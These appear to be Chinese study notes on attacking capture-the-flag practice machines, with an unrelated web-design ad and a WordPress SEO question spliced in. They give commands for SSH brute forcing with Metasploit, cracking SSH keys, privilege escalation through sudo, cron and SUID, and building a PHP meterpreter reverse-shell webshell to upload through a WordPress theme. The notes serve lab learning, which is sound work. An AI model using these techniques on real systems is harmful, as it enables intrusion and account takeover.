DC系列靶機知識點總結

常用命令和工具：

創新互聯專業為企業提供蕪湖網站建設、蕪湖做網站、蕪湖網站設計、蕪湖網站制作等企業網站建設、網頁設計與制作、蕪湖企業網站模板建站服務，10多年蕪湖做網站經驗，不只是建網站，更提供有價值的思路和整體網絡服務。

metasploit nmap sqlmap 中國蟻劍 冰蝎 dirsearch dirbuster 等常用工具就不在此介紹了

whatweb是kali自帶的一個信息搜集工具

數據庫密碼hash解密工具john

cewl是kali自帶的一個密碼字典生成工具

針對wordpress站點可以使用wpscan先爆破該網站的用戶名

通過已經wpscan掃描到的用戶名和cewl生成的密碼字典可以對目標進行爆破登錄

漏洞搜索：

python交互式shell

RCE反彈shell的命令：

SSH服務相關命令

目標機器連接kali利用ssh將 exp下載到靶機上來

涉及到的提權方式：

**Tips：**拿到一個本地普通用戶后，往往先要在該用戶的家目錄下搜索一番，以尋找有用的信息，提權的時候幾乎所有的文件操作都在tmp目錄下，因為其他目錄往往沒有權限，所以要時刻注意自己當前所在的目錄。

suid之find提權

sudo提權系列：

sudo之teehee提權（方法不唯一）

teehee命令可以對文件進行寫入操作，我們可以借此來提權

利用寫入定時任務來提權

上面這條命令的意思是在/etc/crontab下寫入定時計劃，一分鐘后由root用戶給 /bin/bash 命令加權限（chmod 4777即開啟suid和rwx權限），這樣當我們再執行/bin/bash的時候就可以獲得一個root權限的shell。除此之外還可以利用寫入/etc/passwd文件添加一個有root權限的用戶來提權。

sudo之nmap提權

我們使用 sudo -l命令發現我們可以不用密碼就能以root權限運行nmap

然后我們可以利用nmap來提權

由于我們可以以root權限 運行nmap，然后我們讓nmap去執行這個shell腳本，從而獲取到一個root權限的shell。

臟牛提權

我用wordpress做了個博客www.sanxia5.com，可以都快過去半個月了，怎么百度只收錄個首頁?

可以去百度申訴把之前WordPress搭建收錄的頁面刪除

關于WordPress優化教程可以看下這篇文章

入侵開放22端口的靶機

本人筆記，僅供參考

相關靶機：

鏈接：

提取碼：qd32

滲透分析：

對于開啟ssh服務的22端口的靶場優先考慮

1.暴力破解

2.私鑰泄露

對于開放http服務的80端口或者其他端口的靶場優先考慮（特別注意大于1024的端口）

1.通過瀏覽器訪問對應靶場http服務如地址：端口號

2.使用探測工具對http的目錄進行探測，如dirb?地址：端口號

挖掘敏感信息：

使用瀏覽器對靶場IP的http服務探測，對頁面中展示的內容也要注意，尤其是聯系人等信息(有可能就是ssh的用戶名信息)，?遞歸訪問，力爭把每一個dirb掃描到的目錄頁面都訪問查看;

尤其對robots.txt、以及一些目錄進行訪問，挖掘具備利用價值的信息。對于開放ssh服務的靶場，務必要注意是否可以尋找到ssh私鑰信息(id_?rsa);

對于某些靶場，也可以使用nikto掃描器來挖掘敏感信息;

--?nikto?-host靶場IP地址

特別注意config等特殊敏感文件，要細讀掃描的結果。挖掘可以利用的敏感信息;

登錄服務器之后，我們需要做以下操作。

1、查看當前用戶whoami?.

2、id?查看當前用戶的權限

3、查看根目錄尋找flag文件

如果是root權限，那么表明這個靶場就被全部拿下。但是如果不是，就肯定需要提權。一

般情況下，flag文件只屬于root用戶和對應的用戶組:

cat?/etc/passwd查看所有用戶的列裝

cat?/etc/group查看用戶組

find?/?-user用戶名查看屬于某些用戶的文件

/tmp查看緩沖文件目錄

深入挖掘

通過/etc/crontab文件，設定系統定期執行的任務,編輯，需要roor權限。不同的用戶都可以有不同的定時任務

cat?/etc/crontab挖掘其他用戶是否有定時任務，并查看對應的任務內容。執行的任務肯定對應靶場機器的某個文件。

如果在/etc/crontab下有某個用戶的定時計劃文件，但是具體目錄下沒有這個定時執行的文件，可以自行創建反彈shell,然后netcat執行監聽獲取對應用戶的權限。

如果有定時執行的文件，可以切換到對應的目錄，查看對應的權限，查看當前用戶是否具有讀寫權限。

萬不得已的時候只能對ssh服務進行暴力破解。破解最后一個

用戶名。破解工具如hydra、medusa等;

利用cupp創建字典

git?clone?

chmod?+x?cupp.py

./cupp.py?-i以交互的方式創建字典

輸入用戶名然后一直回車到Do?you?want?to?add?some?random?numbers?at?the?end?of?words?輸入yes其他全部no此時創建完成

之后推薦用metasploit破解ssh

在終端中輸入

msfconsole

msf??use?auxiliary/scaner/ssh/ssh_?login（使用該模塊）

set?rhosts??192.168.56.103（確定ip地址）

set?username?用戶名（破解的用戶名）

set?pass_?file?用戶名.txt（剛剛創建的字典）

set?threads??5（輸入線程）

Run（進攻）

此時破解出密碼例如123

直接連接，如果出現問題可以重啟msfconsole，啟用該模塊后

set?rhosts?192.168.56.103?????????????(連接遠程主機）

set?username?hadi（用戶名）

Set?password?123（密碼）

Run

界面簡陋就使用python優化界面

Python?-c?“import?pty;pty.spawn(‘/bin/bash’)”（優化界面）

此時可以把自己權限提升到root：

su?-?root

回到根目錄ls打開flag文件

Ssh秘鑰泄露

解密Ssh秘鑰信息(以秘鑰名id_isa舉例）

Chmod??600?id_isa（賦予is_isa可讀可寫權限）

ssh2john?id_isa??isacrack???????(就是用ssh2john把秘鑰里的東西轉換成john可識別的）

Zcat??/usr/share/wordlists/rockyou.txt.gz?|?john?--pipe?--rules?rsacracks（利用rockyou字典解出所需要的東西）

制作webshell

msfvenom?-p?php/meterpreter/reverse_tcp?Ihost=攻擊機IP地址Iport=4444?-f?raw??/root/Desktop/shell.php

啟動監聽

msf??use?exploit/multi/handler

msf?exploit(handler)??set?payload?php/meterpreter/reverse_tcp

Weoshell

msf?exploit(handler)??set?Ihost攻擊機IP地址

msf?exploit(handler)??set?lport?4444

msf?exploit(handler)?run

上傳Webshell

使用找到的敏感信息登錄系統后臺，上傳webshell。?執行

webshel(訪問具有webshell的php頁面)

獲得反彈的shell

--

wordpress.上傳點theme?404.php

執行:?http://靶場IP/wordpress/wp-content/themes/twentyfourteen/404.php